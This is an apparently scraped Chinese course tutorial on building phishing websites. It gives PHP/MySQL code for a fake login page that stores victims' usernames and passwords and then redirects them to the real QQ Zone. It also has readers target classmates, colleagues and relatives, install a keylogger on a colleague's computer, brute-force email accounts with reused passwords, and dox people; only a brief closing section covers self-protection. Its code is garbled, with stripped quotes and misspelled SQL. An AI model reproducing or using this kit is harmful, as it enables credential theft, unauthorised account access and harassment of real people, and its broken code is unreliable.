个人做网站郊游的英,男女做视频网站,流程优化的方法,做音乐网站需要版权么钓鱼网站开发原理#xff08;社会工程学#xff09; 一、课程简介1、课程大纲2、课程目标3、知识储备 二、钓鱼网站简介1、什么是钓鱼网站2、开发原理 三、PHP环境搭建1、简介2、自动安装MySQL/apache/PHP3、安装navicat 四、PDO表单入库案例1、语法2、显示登录表单3、入… 钓鱼网站开发原理社会工程学 一、课程简介1、课程大纲2、课程目标3、知识储备 二、钓鱼网站简介1、什么是钓鱼网站2、开发原理 三、PHP环境搭建1、简介2、自动安装MySQL/apache/PHP3、安装navicat 四、PDO表单入库案例1、语法2、显示登录表单3、入库收集用户提交的数据 五、通过PHP开发钓鱼网站六、生活中隐形钓鱼网站人肉搜索原理提防1、社会工程学简介社工2、社工实践1需求获取学生、公司同事、亲人等账号密码2获取网络用户更多信息 3、人肉搜索原理4、生活中隐形钓鱼网站5、提防 一、课程简介
1、课程大纲
钓鱼网站简介是什么怎么写的原理 PHP环境搭建准备 PDO表单入库通过PHP收集用户数据 通过PHP开发钓鱼网站 生活中隐形的钓鱼网站人肉搜索原理提防
2、课程目标
通过本次公开课大家可以
理解钓鱼网站概念原理 掌握PHP环境搭建 掌握通过PHP的PDO扩展收集用户登录表单提交的数据 掌握钓鱼网站的开发 理解人肉搜索的原理提防
3、知识储备
HTML基础 PHP基础 MySQL基础
二、钓鱼网站简介
1、什么是钓鱼网站
钓鱼网站指伪装成银行/社交平台/购物平台窃取用户提交的银行账号、密码等私密信息的网站。 简单概括坏人制作了一个网站通过各种手段将网址发给你你没抗住诱惑输入了银行账号和密码。
2、开发原理
步骤1 通过各种渠道传递诱惑消息诱导用户打开 利用传智PHP学科基础班DIVCSS课程技术-》所开发的钓鱼网站
步骤2 通过表单收集用户提交的账号密码
三、PHP环境搭建
1、简介
工具PHP study.exe网址http://phpstudy.php.cn/ 环境 MySQL存放数据 Apacheweb服务器 PHP将用户提交的账号密码保存到MySQL中
2、自动安装MySQL/apache/PHP
3、安装navicat
Navicat数据库管理工具MySQL用于查看本地数据库中的表
#创建名为php的数据库
drop databse if exists php;
creat database php;
use php;
#创建表
drop table if exists users;
id int primary key auto_incream comment ‘编号’,
username varche(45) not null comment ‘账号’,
pwd varche(80) not null comment ‘密码’,
creat_at int not null default 0 comment ‘创建于’,
updated_at int not default 0 comment ‘更新于’
)charsetutf8;四、PDO表单入库案例
1、语法
HTML知识点
表单form action./test.php methodpost /form
账号input typetext nameusername id
密码input typepassword namepwd idPHP知识点
//通过PHP的PDO扩展保存数据
//创建PDO对象
$pdo new PDO(mysql:dbnamephp,root,root);
//执行sql语句将输入的账号密码保存到MySQL仓库中
$rs $pdo-exec(insert into users values(null,$username,$pwd,$time,$time));2、显示登录表单
步骤1使用sublime创建test.html文件 步骤2输入【】按【tab】键 步骤3输入【下述代码】即可
form action./test.php methodpost center p账号input typetext nameusername id/br/pp密码input typepassword namepwd id/br/pinput typesubmit value登录 stylewidth: 250px;height: 40px;background-color: blue; font-size:18px;color:white;/center
/form3、入库收集用户提交的数据
步骤1创建test.php文件 步骤2通过$_POST[‘NAME’] 接收数据 步骤3通过PDO语法入库
?php//服务器端脚本
//获取全部提交的数据 $_POST
//获取_POST里面的指定数据 $_POST[表单的name属性值]
//打印数据 print_(待打印的数据)//print_r($POST)
$username $_POST[username];
$pwd $_POST[pwd];
$time time();//通过PHP的PDO扩展保存数据
//创建PDO对象
$pdo new PDO(mysql:dbnamephp,root,root);
//执行sql语句将输入的账号密码保存到MySQL仓库中
$rs $pdo-exec(insert into users values(null,$username,$pwd,$time,$time));
$realUrlhttps://qzone.qq.com/;
//判断跳转
if($rs){echo scriptalert(success);location.href$realUrl/script;
}else{echo scriptalert(failure);location.href$realUrl/script;}?
//提交信息后输出警告框提示信息并跳转到真实网址五、通过PHP开发钓鱼网站
步骤1将钓鱼网站文件放到站点目录中 步骤2访问测试 步骤3通过PHP创建收集用户数据
六、生活中隐形钓鱼网站人肉搜索原理提防
1、社会工程学简介社工
简单理解 利用“人性”的心理弱点、本能反应、好奇心、信任、贪婪等心理进行欺骗、伤害等危害手段、最终取得自身利益的手法。 应用场景短信诈骗电话诈骗如以知名人士的名义去推销诈骗等
2、社工实践
1需求获取学生、公司同事、亲人等账号密码
学生角色讲师/同学-》通过PHP开发个人博客–》查看精品文章必须注册 同事人物性格、兴趣爱好分析-》通过PHP开发偶像博客/论坛-》注册上厕所/吃饭电脑安装键盘记录精灵 亲人通过PHP仿QQ空间相册封面女友照片-》发送亲人点击提示输入账号密码-》入库
2获取网络用户更多信息
场景1普通用户A通过钓鱼网站导致密码被盗 场景2网站被攻击管理员邮箱和账号被盗 明确80%的人的银行卡、QQ、微信、身份证等密码都存在关联或者直接一样 手法通过落网用户的已知账号和密码-》进一步采集昵称、163邮箱、qq邮箱、贴吧等进行分析-》人肉-》尝试暴力破解注通过落网账号密码分析后获得163邮箱账号尝试暴力破解成功进入后如果是一个站长势必会进一步获得购买服务器等相关信息
3、人肉搜索原理
准备确定人肉角色 手法获取该角色常用昵称、手机号、qq号、邮箱、微博等信息-》谷歌/百度 结果真实性格、兴趣爱好、经历、历史照片等
练习 通过留下的账号信息进一步分析 1点击头像进入个人主页 2通过关注的贴吧-》兴趣爱好 3回复的内容 -》性格人品思想 照片
还能搜索此人以前注册的网站
4、生活中隐形钓鱼网站
1百度地图记录你去过的地方 2微博提供接口所有用户发布的说说动态 --》便于商家提供用户体验 3智能手机相册同步云–》可能存在人脸识别大数据分析、万一数据泄露 4安卓手机应用商店APP小心下载注避免钓鱼网站 5社交软件附近人/摇一摇注慎用你以为是女的指不定就是我
5、提防
1避免在网上留下痕迹如QQ、手机号等注可通过上述方式检测删除 2搞编程势必需要登录一些网站看资料或视频 --》 切记用小号密码123456 自己注册个小号密码随意
